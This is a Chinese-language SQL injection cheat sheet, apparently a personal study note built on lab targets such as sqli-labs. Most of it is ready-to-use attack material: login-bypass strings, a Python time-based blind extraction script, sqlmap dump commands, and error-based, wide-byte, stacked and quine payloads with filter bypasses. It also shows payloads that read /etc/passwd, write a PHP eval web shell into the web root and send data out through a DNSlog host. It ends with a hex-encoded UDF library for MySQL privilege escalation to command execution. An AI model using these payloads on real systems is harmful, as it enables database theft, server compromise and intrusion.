SQL注入
SQL注入
炒冷饭嘞,以下内容已经淘汰啦。
文章目录
1. sql注入简介
主要参考了Lazzaro佬的文章
趣闻:
5LmL5YmN55qE5qCh5Zut5oub6IGY5Lya5Y+q5pyJ5LiJ5Zub5o6S5LyB5Lia77yM5oOz552A6L+H5Y675LqG6Kej5oOF5Ya177yM5rKh5oOz5Yiw5bey57uP5omT54OK5LqG77yM5Zyw5LiK5bmy5YeA55qE5rKh5pyJ5LiA5byg57q477yM5ZCs6K+0546w5Zyo5LyB5Lia6Z2eOTg1MjEx56GV5LiN6KaB44CCCgrlrrbplb/ku6zop4Tlip3ogIPnoJTvvIzlkIzlrabku6zorqHliJLogIPnoJTvvIzoiI3lj4vmiqXkuobogIPnoJTovoXlr7znj63vvIzku6XlkI7op4HpnaLnmoTmnLrkvJrkvJrotormnaXotorlsJHlkKcKCmJvc3Pnm7TogZjkuIrpmaTkuoblpJbljZbphY3pgIHnmoTkuK3ku4vvvIzmiYDmnInmnKzkuJPkuJrnm7jlhbPnmoTogYrlpKnpg73nn7PmsonlpKfmtbcKCuiHquS7jueugOWOhuaKikMx6am+54Wn5ZKM5Zub5YWt57qn5YaZ5LiK5ZCO77yM6L+e5aSW5Y2W6YWN6YCB55qE5Lit5LuL6YO957uV6YGT6ICM6KGM7aC97biE
那种勃勃生机、万物竞发的境界,犹在眼前。
mysql忘记密码,好像要开终端管理员
net stop MySQL80 或者进services.msc里停止服务
mysqld --console --skip-grant-tables --shared-memory
mysql -uroot -p #可以无密码登录
use mysql;
update user set authentication_string='root' where user='root'; #修改密码
exit
net start MySQL80
-- 查询
mysql -u root -p123456 -e "use db1;select * from tb1;"
-- 创建新用户并授权
CREATE USER 'newuser'@'*' IDENTIFIED BY '123456';
GRANT ALL PRIVILEGES ON *.* TO 'newuser'@'*';
FLUSH PRIVILEGES;
注释
# /**/ -- (--后有一个空格)
空格
0x09,0x0a-0x0d,0x20,0xa0
换行符
%0a
内联注释
/*! select **/ from tb1;
注入点类型:数字型,字符型
注入点位置:GET注入,POST注入,Cookie注入,搜索型注入,HTTP头注入
注入手法:联合注入,报错注入,布尔盲注,时间盲注等
information_schema.schemata:
该数据表存储了 mysql 数据库中的所有数据库的库名
(schema_name)
information_schema.tables:
该数据表存储了 mysql 数据库中的所有数据表的表名
关键字段有table_schema
数据库名,table_name
数据表名
information_schema.columns:
该数据表存储了 mysql 数据库中的所有列的列名
关键字段有table_schema
数据库名,table_name
数据表名,column_name
字段名
information_schema.TABLESPACES_EXTENSIONS
mysql>8.0.21,查询数据库名和表名
InnoDb引擎且mysql>=5.5.8,查询数据库名与表名
select group_concat(database_name) from mysql.innodb_index_stats;
select group_concat(table_name) from mysql.innodb_table_stats where database_name=database()
mysql>=5.7
sys.schema_auto_increment_columns
这个视图用于保存有自增字段的数据库信息,一般设计表时都会设置自增字段(如id)
#查询数据库名
select table_schema from sys.schema_auto_increment_columns;
#查询表名
select table_name from sys.schema_auto_increment_columns where table_schema=database();
schema_table_statistics_with_buffer
不存在自增字段时使用schema_table_statistics_with_buffer
# 查询数据库
select table_schema from sys.schema_table_statistics_with_buffer;
select table_schema from sys.x$schema_table_statistics_with_buffer;
# 查询指定数据库的表
select table_name from sys.schema_table_statistics_with_buffer where table_schema=database();
select table_name from sys.x$schema_table_statistics_with_buffer where table_schema=database();
一般流程
select table_name from information_schema.tables where table_schema=database();# 或者schema()
select column_name from information_schema.columns where table_schema=database() and table_name='t_user';
select * from test1.t_user;
万能密码
admin' --
admin' #
admin'/\*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
1'^1# (False注入)
2. 时间注入脚本模板
布尔盲注
使用场景:对真/假条件返回的内容很容易区分,可编写python脚本匹配不同结果来判断是否成功。
select * from users where username=nouser or length(database())>8
时间注入
依赖于通过页面返回的延迟时间来判断条件是否正确。
通常可利用的产生时间延迟的函数有:sleep()、benchmark(),还有许多进行复杂运算的函数也可以当做延迟的判断标准、笛卡尔积合并数据表、GET_LOCK双SESSION产生延迟等方法。
import time
import requests
def my_get(url):#返回时间差
start_time = time.time()
r = requests.get(url) # get 请求
end_time = time.time()
return end_time-start_time
def binary_search(url):#二分查找
global result
left = 32
right = 126 # 可显示字符范围 32-126
while left <= right:
mid = (left + right) // 2
#?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=117,sleep(1),1)--+
t1 = my_get(url + f'?id=1\'and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),{i},1))>={mid},sleep(1),1) --+')
if t1 > 1:
t2 = my_get(url + f'?id=1\'and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),{i},1))={mid},sleep(1),1) --+')
if t2 > 1:
print(chr(mid))
result += chr(mid)
return 1
else:
left = mid + 1
else:
right = mid - 1
return 0
if __name__=='__main__':
result=''
url='http://192.168.10.3:9545/Less-9/'
#外层循环遍历位数,内层循环二分查找 ascii 码
for i in range(1,6):
while binary_search(url)==0:#出错则再次调用
pass
print(result)
使用SQLMAP进行时间注入
爆数据库名
Python sqlmap.py -u "http://192.168.10.3:9545/Less-9/?id=1" --technique=T --current-db
爆表名
Python sqlmap.py -u "http://192.168.10.3:9545/Less-9/?id=1" --technique=T -D security --tables
爆字段名
Python sqlmap.py -u "http://192.168.10.3:9545/Less-9/?id=1" --technique=T -D security -T users --columns
爆记录
Python sqlmap.py -u "http://192.168.10.3:9545/Less-9/?id=1" --technique=T -D security -T users -C id,username,password -dump
3. 报错注入
通过特殊函数的错误使用使其参数被页面输出。
前提:服务器开启报错信息返回,也就是发生错误时返回报错信息。
常见的利用函数有:exp()、group by+floor()+rand()、updatexml()、extractvalue()
等。
(where|and|or) exp(~(select * from(select user())a));
(where|and|or) pow(~(select * from(select user())a),9999);
(where|and|or) updatexml(1,concat(0x7e,(select user()),0x7e),1);
(where|and|or) extractvalue(1,concat(0x7e,(select user()),0x7e));
(where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)));
(where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,ceil(rand(0)*2)));
当向exp()函数传递一个大于709的值时,函数会发生溢出错误。
updatexml() 参数分别为文件名,路径和数值,其中第二个参数不能包括特殊字符。
extractvalue()参数分别为包含xml数据的字段和XPath路径,第二个参数不可包括特殊字符。
group by+floor()+rand()会报主键重复的原因
mysql首先建立一个虚拟表,然后开始查询数据,取数据库数据,查询是否在虚拟表中存在相同key,没有则虚拟表新建key,有则对应的count(*)加一。在group by的时候,rand(0)会被执行一次,发现虚拟表没有该key值,于是在插入到虚拟表的时候,rand(0)又会被执行一次,改变了待插入的key值,导致插入的主键与已有的主键重复而报错。
4. 二次注入
攻击者构造的恶意数据存储到数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。
现在通常Web应用程序大多都会进行参数过滤,来防止注入。如果某处使用了urldecode()或者 rawurldecode()函数,则会导致二次解码生成单引号二引发注入,即二次注入。
Web应用程序通常使用addslashes() 、mysql_real_escape_string()、mysql_escape_string()函数或者开启GPC来防止注入,也就是给单引号(‘’)、双引号(“”)、反斜杠()和NULL加上反斜杠转义。
addslashes函数虽然在过滤之后会添加 “\” 进行转义,但是 “\” 并不会被带到数据库中
比如注册的时候账号是admin'#
修改密码时单引号与前面闭合成$sql = "UPDATE users SET PASSWORD='$pass' where username=' admin'# ' and password='$curr_pass' ";
这将导致#
后被注释,最终修改了admin
的密码
5. 宽字节注入
宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为\'
,其中\
的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。
比如
<?php
header("Content-Type:text/html;charset=gbk");
$servername = "localhost";
$username = "root";
$password = "123456";
$dbname = "db1";
$conn = new mysqli($servername, $username, $password,$dbname);
$conn->set_charset("gbk");
// 检查连接是否成功?
if ($conn->connect_error) {
// 如果连接失败,输出错误信息并停止执行
die("Connection failed: \n" . $conn->connect_error);
}
$conn->query("set names gbk");
if(isset($_GET['id'])){
echo $_GET['id'];
$id=addslashes($_GET['id']);
$sql="select * from tb1 where id1='$id' limit 0,1";
echo $sql;
$result = $conn->query($sql);
var_dump($result);
var_dump($result->fetch_assoc());
}
1%df' union select 1,database(),3 --+
6. 堆叠注入
将原来的语句构造完后加上分号,代表该语句结束,后面在输入的就是一个全新的sql语句了,这个时候我们使用增删查改毫无限制。
比较罕见,可能受到 API 或者数据库引擎影响,比如需要mysqli_multi_query()
来支持多条语句同时查询
?id=-1';select 1,2,(show databases);-- +
7. SQL注入读写文件
secure_file_priv
NULL 不允许导入或导出
/tmp 只允许在 /tmp 目录导入导出
空 不限制目录
#show variables like "secure%";
#my.ini最后需添加secure_file_priv="",然后重启mysql服务
#读文件
-1 union select 1,2,3,load_file("/etc/passwd"),5,6
#写文件
-1 union select 1,2,3,4,5,"<?php phpinfo(); ?>" into outflie "D:\\xamppnew\\htdocs\\security\\muma.php"
-1 union select 1,2,3,4,5,"<?php @eval($_POST['a']); ?>" into outflie "D:/xamppnew/htdocs/security/muma.php"
/*
select hex(666) into outfile "C:\\ProgramData\\MySQL\\MySQL Server 8.0\\Uploads\\3.txt";
*/
把load_file的BLOB数据转为char型数据
select convert(load_file("C:\\ProgramData\\MySQL\\MySQL Server 8.0\\Uploads\\1.txt"),char(255));
select cast(load_file("C:\\ProgramData\\MySQL\\MySQL Server 8.0\\Uploads\\1.txt") as char(255));
dnslog外带攻击,尝试失败(dnslog网址没了)
UNC路径
UNC路径的格式:\\server\sharename\directory\filename
?id=1' and load_file(concat('\\\\',hex(user()),'.ui9a1m.dnslog.cn/abc'))--+
8. 无列名注入
1. 使用join+using爆破列名
join用于合并两个表,using表示使用什么字段进行连接
select * from tb1 as b join tb1 as c using(`id1`);
use db1;
select * from tb1 where id1='1' union all select * from (select * from tb1 as a join tb1 as b )as c;
select * from tb1 where id1='1' union all select * from (select * from tb1 as a join tb1 as b using(id1))as c;
select * from tb1 where id1='1' union all select * from (select * from tb1 as a join tb1 as b using(id1,name))as c;
select * from tb1 where id1='1' union all select * from (select * from tb1 as a join tb1 as b using(id1,name,price))as c;
2. 使用子查询构造列名
select 1,2,3 union select * from tb1;
查询第二列数据
select `2` from (select 1,2,3 union select * from tb1)a; #注意反引号
select a.2 from (select 1,2,3 union select * from tb1)a;
select * from tb1 where id1='-1' union select 1,2,group_concat(`3`) from (select 1,2,3 union select * from tb1)x;
3. 使用order by比较大小
use user;
select * from t_user where id='10' union select 1,2,'o' order by 3;
select * from t_user where id='10' union select 1,2,'p' order by 3;
select * from t_user where id='10' union select 1,2,'q' order by 3;
9. quine注入
Quine又叫做自产生程序,在sql注入技术中,这是一种使得输入的sql语句和输出的sql语句一致的技术,常用于一些特殊的登录绕过sql注入中。
replace(object,search,replace) 把object对象中出现的search全部替换成replace
34 "
39 '
46 .
char(34),char(39) 可替换成如下
chr(34),chr(39)
0x22,0x27
Quine的基本形式就是replace(str,编码的间隔符,str)
其中str的形式为REPLACE(间隔符,编码的间隔符,间隔符)
select REPLACE('.',CHAR(46),'.');
select REPLACE('REPLACE(".",CHAR(46),".")',CHAR(46),'REPLACE(".",CHAR(46),".")');
此时会发现还是有单引号与双引号的细微差别
我们修改一下str的形式同下,也就是把双引号替换成单引号
REPLACE(REPLACE("间隔符",CHAR(34),CHAR(39)),编码的间隔符,"间隔符")
select replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');
#$sql="select price from tb1 where price='$price'";
#payload:
#1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
select price from tb1 where price='1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#'
#1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
10. 一般绕过
select
- 使用table语句
mysql>8.0.19可以用table tb1
代替select * from tb1
,table
没有where选项
- 使用handler语句代替select查询
use user;
/*通过handler语句查询users表的内容*/
handler t_user open as yunensec; /*指定数据表进行载入并将返回句柄重命名*/
handler yunensec read first; /*读取指定表/句柄的首行数据*/
handler yunensec read next; /*读取指定表/句柄的下一行数据*/
handler yunensec read next; /*读取指定表/句柄的下一行数据*/
handler yunensec close; /*关闭句柄*/
空格
- 多层括号嵌套
- 改用+号
- 注释代替,比如:
/**/
,/*! mysql专属*/
and/or
后面可以跟上奇数或偶数个!、~
可以替代空格,也可以混合使用(奇数还是偶数看实际环境),and/or前的空格可用省略%09, %0a, %0b, %0c, %0d, %a0
等部分不可见字符可也代替空格
单双引号
- 需要跳出单引号的情况:尝试是否存在编码问题而产生的SQL注入。
- 不需要跳出单引号的情况:字符串可用16进制表示、也可通过进制转换函数表示成其他进制。
-- hex 编码
SELECT * FROM Users WHERE username = 0x61646D696E
-- char() 函数
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
逗号
- 采用
substr((database())from({})for(1))
的形式 - 采用join:
union select * from ((select 1)a join (select 2)b join (select 3)c);
等号
like
- 用
regexp
或者in
<>
and/or
- 双写绕过
anandd
,oorr
- 运算符替代
&&
,||
- 直接拼接
=
号,如:?id=1=(condition)
似乎与php特性有关 - 其他方法,如:
?id=1^(condition)
、?id=1)xor(condition)
union
- 盲注:
select * from t_user where id=1 || (select count(*) from t_user)>0;
limit
'and(select pass from users where id=1)='a
'and(select pass from users group by id having id=1)='a
'and length((select pass from users having substr(pass,1,1)='a'))
where
- 用join
if
case when
order by
group by
其它关键词
- 大小写绕过
- 双写绕过
- 使用
CONCAT()
时,任何个参数为 null,将返回 null,推荐使用CONCAT_WS()
。CONCAT_WS()
函数第一个参数表示用哪个字符间隔所查询的结果。
SELECT 'a' 'd' 'mi' 'n';
SELECT CONCAT('a', 'd', 'm', 'i', 'n');
SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');
11. 常见mysql提权
1. UDF提权
UDF:User Defined Function 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行提权。
提权原理:攻击者通过编写,能调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,在数据库中通过导入的共享库文件创建自定义函数,该自定义函数功能依照于共享库文件的功能,从而在数据库中调用该自定义函数能够使用系统命令(就像使用version()函数可以查看数据库版本,自定义函数就可以执行系统命令)
- 在sqlmap找到有如下文件的目录
- 找到cloak.py,用来解码sqlmap中的动态链接库。(好像没用)
# 解码 32 位的 Linux 动态链接库
➜ python cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so
# 解码 64 位的 Linux 动态链接库
➜ python cloak.py -d -i ../../data/udf/mysql/linux/64/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so
# 解码 32 位的 Windows 动态链接库
➜ python cloak.py -d -i ../../data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll
# 解码 64 位的 Windows 动态链接库
➜ python cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll
- 找到MySQL 的插件目录,
show variables like '%plugin%';
- 写入动态链接库
SQL 注入且是高权限,plugin 目录可写且需要 secure_file_priv 无限制,MySQL 插件目录可以被 MySQL 用户写入,这个时候就可以直接使用 sqlmap 来上传动态链接库,又因为 GET 有字节长度限制,所以往往 POST 注入才可以执行这种攻击
payload查询网站
可能需要先修改"C:\Program Files\MySQL\MySQL Server 8.0\lib\plugin"目录的权限为完全控制。
show variables like '%version_%'; #确定平台是64位还是32位
是windows64,则使用如下代码
SELECT 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000677cbfda231dd189231dd189231dd18904dbbf89211dd18904dbbc892a1dd18904dbaa89261dd189231dd0890f1dd18904dbac89211dd18904dba089221dd18904dbab89221dd18904dba989221dd18952696368231dd189000000000000000000000000000000005045000064860300a727a15a0000000000000000f00022200b020800002000000010000000800000109f000000900000000000100000000000100000000200000400000000000000050002000000000000c000000010000000000000020000000000100000000000001000000000000000001000000000000010000000000000000000001000000098b2000008020000b0b10000e800000000b00000b00100000050000050010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000800000001000000000000000040000000000000000000000000000800000e0555058310000000000200000009000000012000000040000000000000000000000000000400000e02e727372630000000010000000b000000006000000160000000000000000000000000000400000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332e393100555058210d240209e1e421439d3bdfb7de7400000f0f0000002a0000490000d41de9feff833a007450488b05a421000049890009a24008cd4973d20a9f109c1899cd9f34272096280fb70593666d83fdb7410b30b001c332c0c3cc00c215cc92c9ba810034716a6febcc16e46c096a471853fdbf1fa4631c0fb605591688401e41c7011e00ffed6dd62b8b63bf01750f3f42088338007506c64b26ebdc01017b4e2d632b05b9e4b228ce25227ed20cd26f1f28152ab001c3f66d7bc2bf83ec38344a43895c243084b7fff6dbd90b09ff15c71f2b4885c04c8bd87512104c24df6eaeb9608707202dc4388e897c242873edcdfd33c048c7c1ff0033fbf2ae1c120976d9b75b1af7d122e901890b2dcc00be6feb166f28e3026e404848deda7fdb29f938d87459488d0d40ee4e0e813832983de4c1eb81403281480a9ee4435e4f81503281543281563261f37d4fb0018c48804028c34c49467607744e61deed584917e49260680a703c6527cd18782056c740045cf8bf33b64342188b48048b008d4c010239bd1e77d27d8bd947107543706d8045ec1be936130309884370900a00b69dee10c8980a18bc0cb3c6b00e07103fbcb37ddb0f49a585c974066f5d17b7086d21cf93cf047424ada3b9772d7110448b6949e2fa02c2eddfba52e2ce0212498d5c3001e83f0ffce85cd7fddd5febcb418b03c60430d2470d5734b70c58d7e22d0822d34313167bb75bce2618007ca01cff56677c84842f7198f4cf16c64373870d087c8c03d6e4240f79561e541e511e7292939c4e1e4b1e481e63c2425e3e1e1fcf2784ee87c71f1da0981f4c89c68685ee44241824580f6c59897486bb86db76381764bdb900d34c18284cb0db7e302d4d8bf146e8e7b901ee9b6dc1ec04e00dda4533ed4488670beef69b4ff04c39290f8413050673f215fdcfb8b9169125ac1c088be8747b418d5508e1c9b6b13ac0e6cc177c7466a04b6640fa50669047fc3f42858e1b0b9529328d7936ce6f7d61c16c304375cd8cc74803c8f56636b724d470143e51c5ba08e1d9b68d39cc1ceb13225975ad886cdbb6f050eb258bc77004cd1930ddfe9cdb803e30e2154874229245ffb176d8827811fef5887edd4d174ebe5a0eebc18424805ec606e71ada0001380c4c38f12a10f8386c04c6f0a0581a87e792317fd3dc5cd8d6d09d58747a28f2023f73b773df3e448d48406e41b80010b3748bd1f10df7c7ed33c9ab441a5356104cefa2dbe6b66c02c8d8154e1b8d54b94c350aede98d054a75890ba3b16e3b2dbc3133d2c7d0208925183bdf19b7b3bad2c80df2199d30ac581e29eb081433c0922fb384f13be0064ceb0033c029001bb0dfb65538ec024510ff10c9196600fb6f7f6c900390483b0d89293f751148c1c11066f7dddd6fdfb87502f3dac1c910e9150aeccc405361203b8b7d1b5801a05fdcd25b0bfbeef7f685dbc905112fd005020675098d430185bb76efb6205b42c703d59b0d3c48b406634136670b1c5805b12006615bd85bc3cf55d27f6cc7c7c376fc608468e140dcfbf1c2c63831e83be141bdd20f8503ee46bb7408075ee428073c0f8e0d8de6b61b6e2bc58ed3105fdcfd3e76fb0fb12d602e0a741ef290b9e803c91d19bfdb36931d4275e841320783f802740fb9ef6dc3b31fb70eca0208e2ed0d2f2e338e740fd2111912f874491412fc18dadc0b1fd958f847df72165f1803b6bb2d701e4ad0c9eb081573ed12ecf6bedbcf2774192d06429bd72d0698fbfb66d833db891db80e871db906716fc7feb59806e5413bd5dde26541042530bb7dbbbd002c0978081e8bf3f048b93d883072b0b7920a63c7741ad64618d7d29b2f1c6b75e3eb037bf5a79a5ed6390c950cdaeb3fea1f9f7db7f08e8f080644892d312d1bc485c0678fed62771a15e5de0dd6181abe7fddbbeec7050725024585f67507b404bb833d14ddc96e73068b212a0b2d5c6f11dedd264fe3029cf12c66012d3a273e9e9ebe10c58f38d240e468ec98717a60dce91748c3b14d22190f6c20483a5adbf308505851f0dd05bbee77df3d041f208915d12695d275133915d709ed7f38c3750b5a17c61e83fa017405040add6be00275338931d39d08a3b71b0d34c84e20c574134ac68b07863db9d7a64bfc1616e0c9016b3c1a0edc83ffb092ebda1535ab311bc11bdb5b0bd80c430c1dc817084d7bf787755c0b1841ffd385ff88ff03753970f79d75094a08aeeb8d1ca51e36ec648b171028adeb06d8192ecc298adc25f3008bc3659e8793708b218b8bf8b59d9e2a4055bf15eaa3894d7afab61b01018b080724b0d67d5d902dd9c2302f5e7d0ab1485825ff4ddb960c1e92387d2eda02f101d7136fa3f875056c0cfcfa7d918844a4fd258b036983eb2f9e8e090cefc6f852a1899e2681ec880068cd760dbffe73153f156705b8c648f25845b7390cb8283d1f2c586170c339def61624eb754148b73dc6364238004044230430090e662fcf40280578254703055c73874c1c51494e7d4bb1077f4bf0eb222b8093447bdd837d738d0e83c00812d13e8d67db7b642a059b240d20902f9c5ba25b701c2a7214097bc009cc3e1e666c926724766e833572dbff0b70dc7a142f482c38b0bb2493827b8ef083d2396a14019b15650ccb36dc9255b624c80a271b83d76c1854ba6a234e336b1784f781c4aca041592947a626231c0fd8cf53188186d9ef0d68295a4a148a8ef8ececcdd64427cb1366eb75b908674b32d21dea902d3a1c1128106464200a8b83af334463971bcb36e418c323db83a238243d05f62809993959b611402bdc678c90c136de1bc3017f37320296247f15f4f6120d6276d81bc00383e8013c2075643f289c8d3d53041a787f4b8d1d4c068d13a08491790ec372b3326129a9ef4f137f2344720cc96681394d5a75fcb7c3ff174863513c813c0a5045e1137c0a180b020f94c063e343029f4c63413cfec9b4ebed8d7ed24c03c1413c4014450458064525ffc25f6a4ab10018741f8b510b3bd2720a8b4108ed6ff8db03c209d072104183c113c128453bcb72e16fc796b05d1cc1c3cf4cc1267af7446992e1da85dcbd1f4c2bc15feafb5abed0140ccd0f3a24c1e81f600d2cfef7d083e001eb02584fd644ab360196ebcac0b66c3008eec18b01a7ffaa128d3cc77627252205cc11ce78dca606cb113f75463da70ff0dd4603241b471eb801000000277c29847f3fe520000081bff83c3dfc32a2df2d992b7dc7f83074149d6fa3d00e7f5dc6268b2dc285586b212430bc6286b6489934e10ab9b4c856e04671d849460bb50e731c0eb110d9be10a8d813fe6a4cb84c33dbceb8ff00856037ba1623e9b8338975dde016b1df744d44d89c1d39b705dbdd8449f7d3093720d2fbdc4b4646463605dee0e2e4b24746465e505a11000055c9a8aa298064547fb017d8069017303007d04e6f206172ffffdffe67756d656e7473096c6c6f77656420287564663a206c69625f6d79730bf6b7dd716c0d5f73085f696e666f29411c80edff232076657273696f6e20302e0134ededee17a178706563744b657861076c79201a6dbb7dfb652073747243672074791b2070766175d8299b6d21724f2f7477996d60010b1f438ef6f603fb72206e616d4c436f756c246e6f74cce8b66d3b63611320186d27796372ff850740310106023532023001240d0024f6ffb7ffd407001fc408001a740b15640c0010540b000b340a0004822776bbdcfe1918090018c40f13740e640b093427b763d4ed046217d41e5e3f1903241aedbacf2c5007390f2a07801abbdc6e8367165b16743711640c340b7bd85b770442130c390c01118350118b9b6df705530133871c03e4001d5d90ed60430e057b743f09baeeb0d80401072f67079403a06077dbc10701462f462b1074092f0db6d94e3416033b01000715bb0bb6bd971574062f64f7df21000884ddb640ae043439741f00bf20eeecedb6140629034c341f0ba903e1c2debe240f05c305340a13234bd36d9b6e23431e14c45f0f470a75b713760554094b01098909a2071e7de572bb1f1e742f12640d34870142b71582bb2e1311cf0c03ca96dd0e01380f387427005124a3aafec10246ddcd5d20d266d4ff555516c900178fa02a1b003011764bd56c039180bfa007e0126dd79ddd03703407f803680b0013026a76fbba8603540b14021814170b581590fb2f07d9eeecf60a150310340727030034075bd5b9dd7003e0336f0724b3cc755dd7750b30074203ac0b9007f5b61b94db03c03233920c1903c8ba05a0eb0b10074f8be80b508375afeb077303444707990ba0b65dd77507e503280bf0073a1c033c0038b7eb0b5007f71ca70b77b63bdb8b191d2f2007381dcb40071dac7b5d83036c8307d30b601e9ded5eb3039b7c5f07c11e3be0d0ae3bdb07031f3b1007d6039c33ca1255954a005525a3aaa8aa9251645455c9d09ba0887c0402c4ff16360157616974466f7253ac7f2b40fc6c654f626abd14566972747561f63703c46c419a0d536574456e76126dbf01e26f6ee45661726961622b41eb2e40bc18437265b8546806640df65bf76d47264375727222502a636573734914e283cd1226135469636bb6fd6e03026e6b517565727950036684dedbb1f66d616e3716657218446973676fdbdbcf374c6962727879436192731a52746c633bb76d0970a2722d2c7874124cbdb5adfd6f6f6b7570463ec26916b2747279dfb5078b17cd556e77e47e4973446562736f6bed75676763a7a56583e11dfeb6b77268616e64457883704046696ca56c85c58719f19319dab61254176d65151153daf6586b39352b537973176dfa81e87517454173426509a3dbfe434388a0895f616d73675fcc6990b3850bbf5f5f435f73708b6966285f7e267cdb766f5f64116f035f706f6922430b76db2663da5f64ce280009626b31142d325f7a13c417840b5f7b50705b6c735f330a6c212205db5accd82a58096e73ed6bc982130fd76d643ed6bad6de756c343f15416d170cdea3e0020ab52689a3b565c933a196063bc16db15b0772652508661115080d5ba1739c29709f73149bb5adb93932ae6e074d0f85d7badbc56f736a663a70105e3b84ed70705831747b6d343fdf15f4c700f08c21180800e264860600a76efb0fe327a15ae6f00022200b020808120cb07744b314132e0010000005cf1e6c9b02020433050002088000c302f663146d160100022e063af76c650f0a50394330908de8db88223c1460e2d880d4bd0118020183703aacbb024b00303a011e4644a42b2e1054822d3bd810901200dc00b3dbc63b6f602e7264a76108550b53597761dd000c03162740022e26291b61f600d805100c22273616ececc02e702850eb27244fd820fc007273726300136027b3c7013226650942fca664b0702728421b4036c08d6d05ca7212d3060000000000009000ff0048894c240848895424104c8944241880fa010f854502000053565755488d35cdf0ffff488dbe0080ffff5731db31c94883cdffe85000000001db7402f3c38b1e4883eefc11db8a16f3c3488d042f83f9058a1076214883fdfc771b83e9048b104883c00483e9048917488d7f0473ef83c1048a10741048ffc0881783e9018a10488d7f0175f0f3c3fc415beb0848ffc6881748ffc78a1601db750a8b1e4883eefc11db8a1672e68d410141ffd311c001db750a8b1e4883eefc11db8a1673eb83e8037217c1e0080fb6d209d048ffc683f0ff0f843a0000004863e88d410141ffd311c941ffd311c9751889c183c00241ffd311c901db75088b1e4883eefc11db73ed4881fd00f3ffff11c1e83affffffeb835e4889f7b900120000b2004889fbeb2c8a074883c7013c80720a3c8f7706807ffe0f74062ce83c0177233817751f8b072500ffffff0fc829f801d8ab4883e9048a074883c70148ffc975d9eb0548ffc975be4883ec28488dbe007000008b0709c0744f8b5f04488d8c30b0a100004801f34883c708ff96eca1000048958a0748ffc708c074d74889f94889faffc8f2ae4889e9ff96f4a100004809c074094889034883c308ebd64883c4285d5f5e5b31c0c34883c4284883c704488d5efc31c08a0748ffc709c074233cef77114801c3488b03480fc84801f0488903ebe0240fc1e010668b074883c702ebe1488baefca10000488dbe00f0ffffbb00100000504989e141b8040000004889da4889f94883ec20ffd5488d871702000080207f8060287f4c8d4c24204d8b014889da4889f9ffd54883c4285d5f5e5b488d4424806a004839c475f94883ec804c8b442418488b542410488b4c2408e91f79ffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005cb0000054010000e404000000000000586000003c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f6e3d22312e30223e0d0a20203c646570656e64656e63793e0d0a202020203c646570656e64656e74417373656d626c793e0d0a2020202020203c617373656d626c794964656e7469747920747970653d2277696e333222206e616d653d224d6963726f736f66742e564338302e435254222076657273696f6e3d22382e302e35303630382e30222070726f636573736f724172636869746563747572653d22616d64363422207075626c69634b6579546f6b656e3d2231666338623362396131653138653362223e3c2f617373656d626c794964656e746974793e0d0a202020203c2f646570656e64656e74417373656d626c793e0d0a20203c2f646570656e64656e63793e0d0a3c2f617373656d626c793e0000000000000000000000002cb20000ecb1000000000000000000000000000039b200001cb20000000000000000000000000000000000000000000044b200000000000052b200000000000062b200000000000072b200000000000080b200000000000000000000000000008eb200000000000000000000000000004b45524e454c33322e444c4c